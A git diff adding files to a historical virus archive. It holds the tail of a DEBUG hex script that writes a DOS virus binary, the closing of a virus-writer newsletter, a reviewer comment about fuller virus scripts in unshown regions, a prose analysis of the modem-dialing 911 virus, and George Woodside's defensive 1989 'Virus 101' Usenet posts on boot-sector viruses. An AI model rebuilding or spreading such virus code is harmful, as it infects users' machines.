05 00 B4 40 CD 21 2E 83 3E 8F 00 00 +e 0690 74 04 B4 49 CD 21 2E 83 3E 70 00 FF 74 31 2E 8B +e 06A0 1E 70 00 2E 8B 16 74 00 2E 8B 0E 76 00 B8 01 57 +e 06B0 CD 21 B4 3E CD 21 0E 1F C5 16 80 00 2E 8B 0E 72 +e 06C0 00 B8 01 43 CD 21 8D 16 1B 00 B8 24 25 CD 21 07 +e 06D0 1F 5F 5E 5A 59 5B 58 9D 2E FF 2E 17 00 CD 20 BA +e 06E0 00 11 01 ED 05 80 01 23 0B FF FF 95 22 00 0A D5 +e 06F0 44 00 00 00 00 00 00 00 00 00 00 FF BB F9 FA E8 +e 0700 F2 F8 FA 95 FE E3 FE BB F8 EE E9 FE 95 FE E3 FE +e 0710 BB F7 F4 EF EE E8 95 F8 F4 F6 BB F8 EC F2 95 FE +e 0720 E3 FE BB FE EF F9 FA E8 F2 F8 95 FE E3 FE BB F9 +e 0730 FA E8 F2 F8 FA 95 F8 F4 F6 BB 8A 89 88 95 FE E3 +e 0740 FE BB FF F9 FA E8 FE 95 FE E3 FE BB F9 FA E8 F2 +e 0750 F8 95 F8 F4 F6 BB 01 68 61 FC 03 00 00 00 00 00 +e 0760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +e 0770 00 00 00 00 00 00 00 00 8C 0D 01 00 20 1C C3 28 +e 0780 8C 0D 01 00 FE 26 2E 00 8C 0D 04 7F A7 20 6C 15 +e 0790 24 25 05 00 20 00 C6 08 60 C1 57 18 08 25 AB 00 +e 07A0 44 7F 0A 02 C2 06 57 18 BD 1D 47 01 04 7F 7C 00 +e 07B0 C2 06 B6 00 1C 09 AF 1D 3D 1C 07 02 BD 1D 02 02 +e 07C0 4D 3A CD 20 C8 F7 E1 EE E7 1A 1A 1A 1A 1A 1A 1A + +rcx +7CF +w +q + +--------------------------------------------------------------------------- + + +ARCV NEWS 006. + + Closing. + + Well that it for this time the mag in future will be a Bi-Monthly +affair and I now offer out to you all to send in any articile for inclusion +in future issues. + + Well I'm not sure what will be in next month but we should have the +Asm source for Commander Bomber Virus and much more. \ No newline at end of file diff --git a/textfiles.com/virus/armag911.txt b/textfiles.com/virus/armag911.txt new file mode 100644 index 00000000..c74435cc --- /dev/null +++ b/textfiles.com/virus/armag911.txt 
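Review bot: the ARCV NEWS 004 and 005 regions of this hunk commit two complete DEBUG scripts (`n ontario.com` ... `w` / `q` and `n sunday.com` ... `w` / `q`) that rebuild the Ontario and Sunday virus binaries byte for byte, and the surrounding text states outright that running `DEBUG < SUNDAY.SCR` "will then produce the .COM all ready for use". Anyone who checks this repository out and feeds those blocks to DEBUG on a DOS machine gets live, memory-resident infectors, and most AV engines will flag the checkout as malicious, which breaks CI and downstream mirrors of the archive. Suggest keeping the newsletter prose (ARCV NEWS 001 through 006) as the historical record but dropping the two `e 0100 ...` hex dumps from the text file, or moving them into a clearly labelled, non-executable sample archive with a README, so the history is preserved without shipping reconstructable malware in plain text.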
@@ -0,0 +1,42 @@ +*************************************************************************** +* The 911 Virus * +* (An "Armagedon the Greek" Variant) * +*************************************************************************** +* Commentary and disassembly by Black Wolf * +*************************************************************************** + + The 911 virus is a direct variant of the "Armagedon the GREEK" +virus, derived merely by changing the text within and the dialing string. +The virus' size is 1079 bytes, making the smallest carrier 1081 bytes. The +main effect of the virus is to dial "911" every once in a while if a modem +is present on com ports 1-4 (the original virus dialed the speaking clock +in Greece). It is a memory resident .COM infector. + + When executed, the 911 virus checks for residency. If it is already +installed, it simply passes control to the host file, otherwise, it goes +memory resident, hooking Int 08h and Int 21h. When 911 goes resident, it +uses a rather strange way of doing it. It re-executes the program and uses +an Int 27 to go memory resident, but because of the second execution it does +not truly terminate and is still able to return control to the host. + + Once memory resident, the 911 virus infect .COM files on execution +(whenever an Int 21, function 4bh is called) after checking if the file has +already been infected. The identification string the virus uses to check for +infection is the string "Support Your Police" located near the end of the +virus (the original was "Armagedon the GREEK"). + + The infection process is also somewhat strange, as the virus +allocates all unused memory for itself, the loads the entire victim file into +memory in one call. It then "infects" it in memory, and writes it back to +the disk. Afterwards, it releases the memory. + + All of the dialing and timing is handled from the Int 08 (Timer +Click) handler. 
When activated, it will dial 911 (police/fire/emergency) +and wait for several seconds. It sends the commands to all ports 1-4, so +the results of hardware other than modems connected to these ports may be +unpredictable. + + The storage bytes are found at the very end of the file, with the +first byte encrypted by adding 0bh to its value. Infected files may be +repaired by restoring these bytes to the beginning, unencrypting the first +one, and cutting the virus off the end of the host program. diff --git a/textfiles.com/virus/atari101.txt b/textfiles.com/virus/atari101.txt new file mode 100644 index 00000000..b509bce8 --- /dev/null +++ b/textfiles.com/virus/atari101.txt 
@@ -0,0 +1,903 @@ +From: woodside@ttidca.TTI.COM (George Woodside) +Newsgroups: comp.sys.atari.st,comp.sys.apple,comp.sys.mac,comp.sys.ibm.pc +Subject: Virus 101 - Chapter 1 +Date: 1 Mar 89 14:39:58 GMT + +Preface: The program VKILLER is specific to the ATARI ST. My apologies +for not making this clear in the previous posting, which went to +several newsgroups. I have recieved far too many requests for the +program from users of other systems to reply to each one individually, +and the mailer has bounced some of the replies I tried to send. If you +have an Atari, VKILLER was posted here a few weeks ago, and is +available in the archives, on GEnie, Compuserve, and from most public +domain disk distributors and User Group libraries. The current version +is 2.01. + +Initial postings will cover virus fundamentals, as they apply to the +area of the Atari ST and, similarly, to MS-DOS systems. The file +systems of the two machines are nearly identical. These general +information articles will be cross-posted to the newsgroups in which +this topic is now active. Future postings will be made only to the +Atari newsgroup, since they will deal with viruses (the plural, +according to Webster's, is viruses) known to exist in the ST world. +They would automatically be different than an IBM virus, since they +are in the 68000 instruction set, or from a Mac or Amiga virus, since +the file systems differ. Since all the viruses I have located are the +"BOOT SECTOR" type (far and away the most common), that's what I will +dwell upon. If and when the proposed newsgroup comp.virus becomes +active, it will be added to the list for all postings. + +Your generic disclaimer: I just an old-school computer hacker, with 20 +years in the software business. I built my first IMSAI many years ago, +and have had several different computers. That qualifies me to have +spent a lot of time on computers, but nothing further. 
I may be wrong +about some things, may have a different opinion than you or anybody +else, or most anything else you'd care to have disclaimed. What I +think is my own opinion, and in no way represents the opinion or +position of my employer or anyone else. I've written several articles +for magazines as well as software related to virus detection and +killing, but I have been known to be wrong (so they tell me :^)). + +While posting any kind of information about viruses may trigger +someone to attempt creating one, I believe that the benefit of the +knowledge to potential victims outweighs that risk. I don't believe +that you can stop someone (who wishes to) from creating a virus by +withholding information - it is already available from many sources. +Since not all viruses act the same, or attempt to attack in the same +manner, it may help potential (or current) victims to learn about the +symptoms of the viruses known to exist, and how to protect themselves. + +While the concept of viruses can be complex, I'll try to keep things +at a level that should be understandable by most anyone past the +casual user genre. However, since I've been at this sort of thing for +some time, what I consider basic knowledge may not be familiar to +everyone. Advance apologies are offered here for any invalid +assumptions, typos, smart alec remarks, grammatic errors, or whatever +offends you. + +Some basic terms, as they have come to be used in this area: + +A VIRUS is any program which spreads itself secretly. It may be +destructive, a prank, or even intended to be helpful, but it spreads. + +A TROJAN HORSE is a program which executes one function secretly while +appearing to be accomplishing some other task, or appearing to be some +other program entirely. One task a Trojan Horse may accomplish is to +install a virus, which would then spread itself. 
+ +A WORM is a program or function which imbeds itself inside another +program, be it an application, part of a system, a library or +whatever. It may or may not spread itself by some means, and may or +may not have destructive intents. + +Now, to the basics of a disk (specifically floppies, but true of most +hard disks as well): + +A DIRECTORY is a list of files and sub-directories. There is one +primary directory (called the root directory) on a disk. It contains +the entries for files, and other directories (called sub-directories, +or folders on the Atari). Sub-directories (folders) may contain +entries of other sub-directories, files, or both. Every file has one +entry in the disk directory (or in some sub-directory). That entry +contains, among other things, the file name, date and time of +creation, length, and the address of the first entry in the File +Allocation Table (FAT) for the file. + +A FAT is a File Allocation Table. It is a road map of how the +operating system will locate data on a disk. Essentially, it is a +series of pointers. The directory entry of a file points to the first +FAT entry of that file. That entry points to the next, and so on, +until the last entry, which contains a special value indicating end of +file. There are two copies of the FAT on the disk, since it is +absolutely critical. Lose the FAT, and the data on the disk becomes +un-accessable. + +A BOOT SECTOR is the first sector on a floppy disk. With the Atari +(and MS-DOS) system, it contains configuration information about the +disk. That information includes how many tracks are on the disk, how +many sectors per track, how many sides on the disk, how big the FATs +and directories are, where the data begins, etc. On the MS-DOS +systems, the boot sector contains the ID of the operating system under +which it was formatted. On the Atari, that value is not used, but +replaced (in part) by a number. 
That number should be different on +every disk, and is used as part of the mechanism by which disk changes +are detected. The boot sector may or may not contain executable code. +If it does contain executable code, it is normally executed only at system +powerup or system reset time. + +On all such disks, the boot sector is number 0, the first sector on the +first side of the first track. On a standard format Atari disk, the +next five sectors are the first copy of the FAT, the next five sectors +are the second copy of the FAT, the next seven sectors are the root +directory, and the remainder of the disk is available for data. + +Now, on with the show: + +Floppy disks are changed on a regular basis while the computer is +being used. More so on systems with no hard disks, but periodically on +most all systems. This event, referred to as a "Media Change", is +detected by the computer's disk drive. The disk door is opened, the +status of the write protection changes as one disk is removed and +another is inserted, etc. When that happens, the operating system must +recognize that the disk has been changed before attempting to read or +write to the new disk. The operating system reads the disk's boot +sector to learn about the newly inserted disk. That instant, when the +operating system checks the new disk, is when nearly all the boot +sector viruses spread. We'll get to that in the next chapter, but first, +a more primary question: + +How did the virus get in there? + +When a computer is booted up from a power off state, or reset (in most +cases), it starts executing code from internal ROMs. Those ROMs set up +primary vectors, minimal configuration information, and perform some +fundamental tests. Then they start moving into uncharted waters. They +have to find out what devices are attached, and get them into +operating status. 
They also have to provide a means of expanding their +own capabilities to support new devices, functions, and whatever else +which may not have existed when the ROMs were created. One of the +means by which this is accomplished is by checking various addresses +for special codes, magic numbers, or any kind of response to a read +or write. Another function which may be enabled is checking the boot +sector on an inserted floppy disk for executable status. If that boot +sector has executable status, the code contained in the boot sector is +executed. That code may cause other portions of the disk to be loaded +and executed, set variables or vectors, or nearly anything imaginable. +That includes infecting the system with a virus, if that's what the +boot sector code contains. Executable status may be via a special flag +value in a reserved address, but it is normally determined by adding +up the value of all the data bytes in the boot sector. If the total +derived (called a checksum) is a specific value (a "magic" number), +then the boot sector is deemed executable. The code is usually executed +at that time. The code is not normally garanteed to be loaded at any +specific address in memory, so it must be "position independant", +or capable of executing no matter where it exists in memory. + +The boot sector is of limited size, normally 512 bytes. While that is +enough for a small program, it may not be enough for whatever task it +is designed to accomplish. So, part of what the code in the boot sector +accomplishes must be to load the rest of the code it needs to get the job done. +This may be a normal data file, or hard coded to some other part of the +disk. + +If the code from the boot sector is designed only to accomplish some task, +it will normally take the steps to do so, then return to the operating +system. This may be setting the screen resolution or colors, issuing +an initialization command to some device, or setting up some option +or feature. 
If the code is designed to remain available after the initial +execution (such as part of a device driver), it must inform the operating +system that it wishes to remain resident. The operating system then +alters the amount of RAM available to protect the space occupied by the +loaded code, so that subsequent programs do not tamper with the loaded +routine. Such a routine is referred to as a "Terminate and Stay Resident" +routine, or a TSR. Viruses must be TSR type programs. They have to remain +in the system, and active, to be able to accomplish their spread, and +eventually, their true goal. If the boot sector program was designed +to attack immediately, it may accomplish its destruction, but it would +never get the opportunity to spread, and the disk which caused the +attack would be easily identifiable. + +Most viruses accomplish system infection by taking over a "vector". A +vector is a specific address in system memory which contains the +address of a routine or function. When an interrupt (such as pressing +a key, the clock ticking, or so on) occurs, processing is suspended, +and the system loads the address in some vector associated with that +event. It executes the routine at the address which was stored in the +vector, then resumes whatever it was up to when the interrupt +occurred. Other vectors are not associated with interrupts, but with +specific functions, such as display a character on the screen, read a +sector from the disk, write to the printer, and so on. + +To take over a vector, the steps are fairly simple. A RAMdisk, for +example, will usually take over a disk read/write vector. When it +installs itself, it removes the current address from the vector +assigned to the disk read/write function. It saves that address in +it's own code, and places the address of it's own code in the vector. 
+When a disk read/write call is made by the operating system, the +operating system loads the address found in the proper vector, and +starts executing the code found at that address. That address now +points to the executable code of the RAMdisk. The first thing the +RAMdisk does is check the function call's parameters to see if the +read/write is for the RAMdisk. If it is, the RAMdisk accomplishes the +read or write, and returns to the operating system. If the read/write +is for some other disk drive, the RAMdisk code passes the call on to +the address it removed from the vector, allowing the assigned device +to accomplish the task. + +There may be more than one alteratiion of the vector. Each new routine +which is installed will save the old vector, and insert itself. That +means that the routine installed last will get the first access to any +call which uses that vector. If it does not want the call, it passes +the call on to the address it found in the vector, and so on. The +significance of this sequencing is that a boot sector virus, if +present, will be one of the first "vector snatchers" to get installed. +Conversely, it will be one of the last routines in the sequence to get +executed when a vector is accessed. + +If the vector in question happens to be for floppy disk I/O, the virus +will be one of the last vectors before the real physical read/write +routine. So, if a program designed to detect a virus's floppy disk I/O +calls is executed as part of a startup procedure, it can easily be +fooled. The detect program will see only normal system I/O calls +passing through the vector. The virus resides in the vector list after +the anti-virus program, so the anti-virus will never see any activity +generated by the virus. The anti-virus thinks that things are +progressing well, while, in reality, the virus is either spreading or +doing damage behind the anti-virus's back. 
+ +If the anti-virus gets installed first (say, by being in a boot sector +itself), it has a better chance of offering protection, but not an +absolute one. Some viruses check things like ROM version numbers, and +know the absolute addresses in the ROMs of the functions they want. By +using those addresses, they can bypass subsequent links in the vector +list, and still do their dirty work. They can also refuse to install +themselves if the addresses or version numbers do not correspond to +the environment they want. + +End of Chapter 1. +-- +*George R. Woodside - Citicorp/TTI - Santa Monica, CA +*Path: ..!{philabs|csun|psivax}!ttidca!woodside +From: woodside@ttidca.TTI.COM (George Woodside) +Newsgroups: comp.sys.atari.st,comp.sys.apple,comp.sys.mac,comp.sys.ibm.pc +Subject: Virus 101 - Chapter 2 +Date: 6 Mar 89 14:00:21 GMT + +In response to a lot of the mail I've received: +1) You haven't missed the "rest of the chapters". I'm posting them as I + get them written. + +2) You may not agree with me. I tried to set down the definitions and + terms as I would be using them, for the benefit of those who weren't + familiar with them. This whole area is rather vague, and most of us + in the trenches and making up the rules, as we learn the game. + +When we left our virus at the end of Chapter 1, it had managed to get +itself installed in our system by being present on the boot sector of a +disk in the machine at cold start or reset. + +Another way a virus may be installed is via a trojan horse program. Trojan +horses come in many flavors. Some disguise themselves as programs which +provide some useful function or service, while secretly doing something +else. The something else may be installing a virus, sabotaging some part of +a disk, setting up hooks to steal passwords on time sharing systems, or +whatever else you can imagine. 
In the event of the virus installer, the +trojan horse has a bit more flexibility than a typical boot sector virus, +simply because it doesn't have to fit itself into a relatively small space. +Since it is hiding in a larger program, it can be whatever size is +necessary to accomplish the task. + +A typical boot sector contains information about the layout of the disk it +resides upon. This block of data requires 26 bytes. The first three bytes +of the boot sector are left available for an assembly language "jump" +command, to allow the execution of the code to skip over the boot sector's +data block. And, the boot sector must add up to the proper magic number to +have executable status. That will require another two bytes, since the +checksum is a 16 bit value. So, 31 bytes are allocated. Since (at least in +the 68000 family) machine instructions are always 16 bits and must begin on +an even address, 32 of the 512 bytes in the boot sector are not available +to any executable program. So, there are 480 bytes available for the +executable code. Machine instructions vary in length, depending upon what +they do, and how much additional information is required. In the 68000, +instruction lengths vary from one to five words, but a reasonable average +instruction length for a program is just over two words. That translates +the 480 bytes to 120 instructions. + +The virus must contain the code to install itself, reserve the memory it +occupies to keep subsequent programs from over-writing it, spread itself to +other disks, and whatever it really intends to do once it decides it is +time to act. That's quite a bit of code to fit into 120 instructions, +unless it extends itself by loading some other part of the disk, or a file. + +Files are pretty much out of the question. Most computer users would notice +if some file they didn't recognize started popping up on a lot of their +disks. 
There are attributes settable in a disk directory which can be used +to tell the operating system that certain files are "Hidden" or "System" +files. If the file had the proper status bits set, it could prevent itself +from appearing in normal disk directory displays. There are, however, more +flexible disk directory listing programs which will display the entries for +these files, as well as normal files. There is also the problem of the +space the hidden file occupies, as well as the directory entry. The space +available on the disk will be less than it should be, since the hidden file +is present. These symptoms would not escape detection for long. + +A more effective method is the use of specific disk sectors. The standard +disk layout covered in the preceeding chapter mentioned such things as File +Allocation Tables, and disk directory space. In a standard format Atari +disk, for example, each FAT is 5 sectors long, and the directory is 7 +sectors long. That is more than enough FAT space to accomodate the entire +disk. A virus in need of more space than 480 bytes might write the +remainder of itself in the last sector of the FAT (I have one that does +this). It might also write itself in the last sector of the directory, +taking advantage of a quirk in the operating system. + +When a disk is formatted, all data sectors are normally filled with a +pre-defined value, E5 (hexadecimal). The directory and FAT space is usually +set to 00. When a directory entry is made active, the file name is written +in the directory, along with some other required information. When a file +is deleted, the first byte of the directory entry is set to E5. That makes +the entry available again. This is a carry over from the early days of +floppy disks, when where the directory would exist on a disk was not as +well defined. The directory entries had to appear as empty on a freshly +formatted disk, so E5 was used as a deleted entry mark. 
That way, no matter +where the directory was, a freshly formatted disk would always appear as +empty. Now, since disk formats are more flexible, the directory is located +by parameters, and normally the entire directory space is zeroed at +formatting time. Since an active entry will have some legitimate ASCII +character in the beginning of the file name, and a deleted entry will have +E5 in the first byte, it is generally assumed that encountering a directory +entry with a value of 00 in the first byte indicates that the entry has +never been used. Since directory entries are used (and deleted ones +re-used) on a first-found basis, finding one with 00 means that not only +has it not been used, but none of the ones following it will have been used +either. Consequently, most software stops looking at the directory entries +when a 00 entry pops up. If there are several more sectors available, there +may be something hiding out there, beyond the last used entry. While this +method of hiding is not foolproof, the typical virus is not concerned about +being bulletproof in all cases. It just has to survive long enough to +reproduce itself, and it has half the battle won. As long as it keeps +spreading, sooner or later it will survive long enough to do the task it is +designed to do, then it wins both halves of the battle. + +There are other ways for the virus to get additional disk space. Typically, +floppy disks are not used up a sector at a time, but rather in groups of +sectors. Each group of sectors is referred to as a data "cluster". The +number of sectors in a cluster is variable, and is one of the parameters +stored in the boot sector. If the number of data sectors on the entire +disk, minus the boot sector, FATs, and directory, is not an exact multiple +of the number of sectors in a data cluster, the remaining sectors will +never be used by the opearting system. A clever virus can find them and +hide there. 
The inconvenience of this is that the unused sectors would +normally be at the end of the last track of the disk, causing long (and +noticeable) disk seeks to load or spread the virus. + +There is a parameter in the boot sector designed to permit the disk to have +sectors reserved for any purpose, and not accessed as part of the normal +data area. A virus could also use this method to extend itself, but it, +too, has shortcomings. Using this feature requires the parameter to be set +when the disk has absolutely no data on it. Reserving sectors causes the +start of the data area to be moved further into the disk. While the data +area would be moved, the data already on the disk would not. Consequently, +altering the reserved sectors parameter would make all files on the disk +garbage. (They could be returned to proper status by restoring the original +value to the reserved sectors parameter, providing no disk write had +occurred.) There would also be the problem of the disk's free space being +less that it should. + +Consequently, if a virus needs extra space, using prescribed system +features or hidden files is not a good choice, since it is too easily +detected. The approach used so far is to hide in sectors unlikely to be +used, and hope to spread before they get clobbered (and it works). + +OK, so now the virus has managed to get onto a disk in your library, and +then get itself booted into your system at startup or reset. It may have +been on a disk you received from someone, and booted with, or it may even +have been installed by a trojan horse, but it is in your system. How does +it spread? + +There are ways, and then there ways..... + +The most common method is through the vector reserved for floppy disk read +and write functions. As we saw in Chapter 1, floppy disks get changed (some +surprise, eh?). One disk is removed, and another is inserted. 
When that +happens, the operating system is notified by the physical act of changing +the disk that the event has occurred. How that event is detected will vary +with different disk drives, but there are two common methods. One is the +disk drive latch. Some hardware reports the transition of the latch on the +floppy disk drive's door. When the locking lever is moved, a signal is sent +to the disk controller card, indicating that the disk door has been opened. +(Door is a carry over term from older drive mechanisms which had fully +closing doors over the disk drive slot.) The operating system makes note of +the fact that a disk change may have occurred. + +The other method is the write protect notch. On both 5 1/4 and 3 1/2 inch +disks, the write protect notch tab is located in a position which makes it +impossible to fully remove and install a disk without having the write +protect detection mechanism be fully obstructed at some point, and fully +unobstructed at some point. The detection mechanism may be a physical sense +switch, or an optical sensor. Either way, as the body of the disk is +removed from the drive, it will be blocked. Then, when the disk is out, the +sense area is open. So, the drive will report transitions on the status +line. The operating system notes the change, and sets the necessary flags +to indicate that the disk may not be the same one that was there a little +while ago. It may also be, if the same disk was re-inserted, but that's not +important. The fact that it may have changed is very important. Attempting +to read or write to the disk, without first noting the characteristics of +it, could be very destructive. + +When the next access of the (possibly) changed disk occurs, the operating +system will read the boot sector. In MS-DOS systems, I believe that the +operating system assumes that if there is a possiblity that the disk has +changed, it assumes that it has, dumps all information relative to the old +disk, and starts fresh. 
In the Atari, the operating attempts to be a bit +smarter. The boot sector contains a serial number which is supposed to be +unique across all disks. This serial number is 12 bits long, and is +assigned when the disk is formatted. If there is a possibility that the +disk has changed, the operating system reads the serial number. If the +serial number is different than before, the disk has changed, all old data +is wiped out, and the new serial number is noted. If the serial number is +the same, the disk has presumably not changed, and the data in the +operating system's internal buffers is assumed to be valid. This leads to +thoroughly trashed disks if two disks have identical serial numbers, and +are used consecutively. + +In any event, when a possible disk change has occurred, the boot sector is +always read to determine the characteristics of the new disk. The operating +system uses the floppy disk read function to access the first sector on the +disk. As previously noted, this disk read function is pointed to by a +vector. If the vector has been altered to point to a virus, the plot +thickens... + +We will assume a typical floppy disk boot sector virus for a while, and see +exactly what happens. The virus first checks the number of the drive being +accessed. If it is not a floppy disk, it passes the call on to the address +it found in the vector. No harm done. + +If the call is to a floppy disk, most viruses check the side, track, and +sector of the call to see if it is the boot sector. If it isn't, it passes +the call on, and again, no harm done. Why? Performance. Not that the virus +cares about good disk performance, mind you. What it cares about is being +noticed. If it was busy snagging all the disk calls, and checking the boot +sector all the time, there would be an incredible increase in disk head +seeking, and a very noticeable drop in performance of the system. 
Anyone +with at least half a brain (witch inkluds sum smarter komputer pepel) would +notice that, and would become inquisitive about what was happenning. The +virus would have given itself away. No self-respecting virus would want to +be detected before it got a chance to spread, and possibly wreak a bit of +havoc, so it remains inactive until it can accomplish its task unnoticed. + +When the read call is to the boot sector, the virus goes into action. The +data is read into a buffer, as designated by the host operating system's +call, exactly as expected. Normally, the disk read function would return to +the operating system at this point, but the virus doesn't. Depending upon +the sophistication of the virus, several things may happen. Some viruses +will first check the image of the boot sector in the buffer, to see if they +are already on the disk. If they find the disk already has the virus, the +go back to sleep (pleased, we assume!). Some even check revision levels in +the virus image, and replace themselves if the disk had a more recent +version of themselves! + +If the image from the boot sector is not the virus, some will check to see +if the image was of an executable boot. If it was, the virus does not alter +it. Doing so would make a self-booting disk fail forever after, and would +probably lead to the detection of the virus. Other viruses, not as +sophisticated, will not execute this test, and may be spotted more readily. + +Now, assuming that the boot sector is not executable, or that it is but +this virus is too dumb to leave it alone, it's time for the virus to +spread. There is a copy of the boot sector from the original virus disk in +a reserved memory area, from the original boot up process. The executing +copy of the virus knows where that is, since it reserved the memory for +itself and the image at the same time. The characteristics of the disk the +virus came from may not be the same as the disk in the machine now. 
+Depending upon the operating system's standards, the virus will either copy +the disk parameter information from the current disk into its own image +buffer, or copy its image into the current disk's buffer, leaving the +disk's parameters unchanged. Either way, the result is a copy of the +current disk's parameters, combined with the executable image of the virus. +Now, the executable status checksum must be computed, and added to the +buffer. This may be accomplished by a routine in the virus, or by an +operating system call. If the virus is on an Atari, it might be careful +enough to insure that the serial number on the new disk remains the same. +Failing to do so would lead to all disks with the virus having the same +serial number. That would lead to disks being accidently altered (due to +the serial number test), and the virus would probably be detected too soon. + +When the new checksum is completed, the updated boot sector is re-written +to the disk. All this occurs in much less than the time required for the +floppy disk to make a single revolution, so the boot sector is re-written +on the next spin. Since the rotation speed of the disk is either 300 or 360 +rpms, the total time lost is less than 1/5 of one second. Nearly impossible +for anyone to notice, when combined with the time required for the drive to +load the head, seek to track zero, read the sector, etc. + +The only potential problem here is one of the virus' intended victim's +primary levels of defense: the write protect feature. Despite rumors to the +contrary, I have not seen a virus capable of writing to a write protected +disk. The hardware in the disk drive will not write if the write protect +status is set. It reports an error to the operating system. The virus can +not override this protection, but it must be wary of it. Older viruses were +sometimes spotted when a system error occurred, reporting that an attempt +was being made to write to a disk which was write protected. 
If the +function being performed (listing a directory, for example) should not be +writing to the disk, there was reason to become suspect. Most viruses now +are more sophisticated. They take over the error vector before attempting +the write, and restore it afterwards. That way, if the attempt to spread +themselves to the new disk fails, the error never gets reported. While the +user doesn't know that the attempt was ever made, the disk also doesn't get +infected. + +Many viruses run counters. Some count the number of already infected disks +they have seen, while others count the number of disks they infect. Either +way, the counting viruses have some threshold they are attempting to reach. +When they reach that number, they (presumably) consider themselves +thoroughly spread, and it is now time to start their third act. + +End of Chapter 2. +-- +*George R. Woodside - Citicorp/TTI - Santa Monica, CA +*Path: ..!{philabs|csun|psivax}!ttidca!woodside +From: woodside@ttidca.TTI.COM (George Woodside) +Newsgroups: comp.sys.atari.st,comp.sys.apple,comp.sys.mac,comp.sys.ibm.pc +Subject: Virus 101: Chapter 3 +Date: 13 Mar 89 14:24:23 GMT + +First, the mail: + +Addressing a controversial topic is sure to generate some strong responses, +and this one is no exception. Mail of the "Thank You" flavor outweighs the +"You Idiot" flavor by about 4-1, so I'll be pressing on. The majority of +the "You Idiot" mail is from senders who either admit, or display, limited +programming ability. For the benefit of those individuals: I appreciate +your concern. I am not attempting to aid in the spread of viruses, but in +your own understanding of them, and ability to defend yourself. People with +the ability to create a working virus will have found little or nothing +they didn't already know in the preceeding postings. There is certainly +nothing in them that isn't already available in the most fundamental books +about personal computers. 
The preceeding postings are also written at a +superficial level, and are missing quite a few specific things necessary to +make a real working virus. Those missing items would add nothing to the +layman's understanding of how a virus spreads or works, so are not +included. You need not take my word for this; contact anyone you know who +is knowledgeable in the system software field, and they will confirm it. + +Sin of omission: + +Part of a message received from Forrest Gehrke (feg@clyde.att.com): + +...One method for a virus finding enough space to hide itself, that I have +seen, you have not mentioned. I have noticed that the so-called Pakastani +virus uses non-standard sectoring at tracks 37 and 38 for IBM PC +diskettes... + +Mr. Gehrke is quite right. I did forget to mention this technique. While I +had heard rumors of it being in use, I hadn't seen it in any of the virus +code I've captured (again, I'm in the Atari ST world). + +I have responded to all mail I have recieved (if it requested a response) +including mailing out copies of missed chapters. Several responses have +been returned by various mailers. If you requested something, and haven't +heard from me, either your request or my response failed. + +Now, Chapter 3: + +Once a virus has installed itself, and replicated as frequently as it has +found the opportunity, it will eventually launch whatever form of attack it +was originally designed to do. That attack is the real purpose of the +existance of the virus. Everything up to this point has been for the sake +of getting to this stage. + +What will it do? Almost anything. The limits are imagination and code +space. The most benign virus I've seen claims to be an anti-virus. It +blinks the screen on boot-up. The idea is that if you see the screen blink, +you know that the benign virus is on the disk, rather than a more malicious +one. It does, however, spread itself just like any other virus. 
From there, +things proceed through the prank levels, time-triggered, messages, ones +which try to simulate hardware failures, to ones which destroy files and +disks. The actions vary from virus to virus. And, of course, there is a +whole different library of viruses for each machine type. Attempting to detect +a virus by describing or recognizing the symptoms is not only a task of +limitless proportions, it is too little too late. When the symptoms appear, +the damage has already been done. + +Several viruses attempt to simulate hardware problems. (Conversly, I've had +several pleas for help with a virus that proved to be other types of +failures.) Frequently these viruses use timers to delay their actions until +the system has been running for some time, and to spread out their +activities to make the problem appear intermittent. Such virus induced +glitches include occasionally faking succesful disk I/O, while actually not +performing the read or write, altering the data being read or written, and +(more commonly) screen display glitches. It is very difficult for anyone to +determine whether such incidents are the results of a virus, or a real +hardware problem. When such incidents start to occur on your system, start +executing whatever virus detection software you have available, before +lugging your system off to a service firm. + +Previously, I mentioned the use of write protected disks as a step in the +right direction to protect yourself. A large percentage of personal +computer systems now use hard disk systems. Floppy disks are more often a +backup media, or offline storage of files not needed on the hard disk for +day to day use. Backing up requires the disks to be writeable, as does +archiving off the infrequently used files. It is good practice to write +protect the archived disks as soon as the files are copied to them. Run +whatever virus checking software you have on the archive disks, write +protect them, and then file them away. 
+ +(When reading the following suggestions about protecting your system from +attacks, keep in mind that not all techniques can be applied to all systems +or all software. Read the documentation accompanying the software before +your first attempt to use it. Be familiar with what it is expected to do +before you run it, and you'll be more able to recognize unexpected activity.) + +The next step is to apply write protection to whatever disks you recieve +software distributed on, before ever inserting them into a computer. Be +they Public Domain, User Group Libraries, Commercial Software, or whatever, +write protect them before you first read them. Then, make a backup copy if +possible. Finally, when first executing the new software, have only write +protected disks in your system. You should be well aware of any legitimate +attempt to write to a disk by the software before it happens, and have +adequate opportunity to insert a writeable disk when the proper time comes. +This will not only give you a clue to the presence of a virus in the new +software, but also protect the new software from a virus already resident +in your system. + +If your system supports the use of a RAM disk, copy new software into the +RAMdisk before executing it the first time. Put write protected disks in +the drives, then execute the software from the RAMdisk. If the software has +no reason to access other disks, especially when starting itself up, be +very suspicious of any disk activity. The most common time for a virus or +trojan horse program to do it's dirty work is at startup, when it is +impossible to tell whether disk access is part of program loading, or some +clandestine operation. By having the software loaded into and executing +from memory, you will be able to detect any disk I/O which occurs. + +Finally, backup everything. Hard disks, floppy disks, tapes, whatever. Make +backup copies, write protect them, and store them in a safe place off-line. 
+If you are attacked by a dstructive virus, your first problem is to rid +your system of the virus. Do not go to your off-line backups until you have +determined if your problem came from a virus, and if so, that you have +removed it from the system. A backup is useless if you give a virus a +chance to attack it as well as your working copy. + +A significant portion of these three chapters have been related to boot +sector viruses. While the most common type in the Atari and MS-DOS world, +they are certainly not the only type. + +What follows is next is mostly a re-phrasing of an article from "Los +Angeles Computer Currents", June, 1988. There are a few direct quotes from +the copyrighted article. While I do not agree with all that this article +states, I can not disprove the items from a position of experience. Since +my efforts here are to inform, you may judge for yourself. A significant +portion of my remarks are oriented to the Atari ST, but the concept is true +to most all personal computers. + +An article in that issue, by Lewis Perdue, outlined the problems he faced +when the IBM PC running Ventura Publisher he was using to create the first +issue of PC Management Letter became infected. I won't begin to copy all +that, but the most interesting part of the recovery task was when they used +a normal (high-level) format program to clear the hard drive. It didn't +kill the virus. They had to resort to a low level format, and rebuild from +all original distribution disks. Their backups had been infected as well as +their working copies of the software. They relied on a PC specific tool +called Data Physician, by Digital Dispatch, to aid in the detection of the +virus. It implements techniques to diagnose infections, but it has to be +installed before the virus strikes. + +Another, more interesting aspect of the article, was categorizing viruses +into four groups: Shell, Intrusive, Operating System, and Source. 
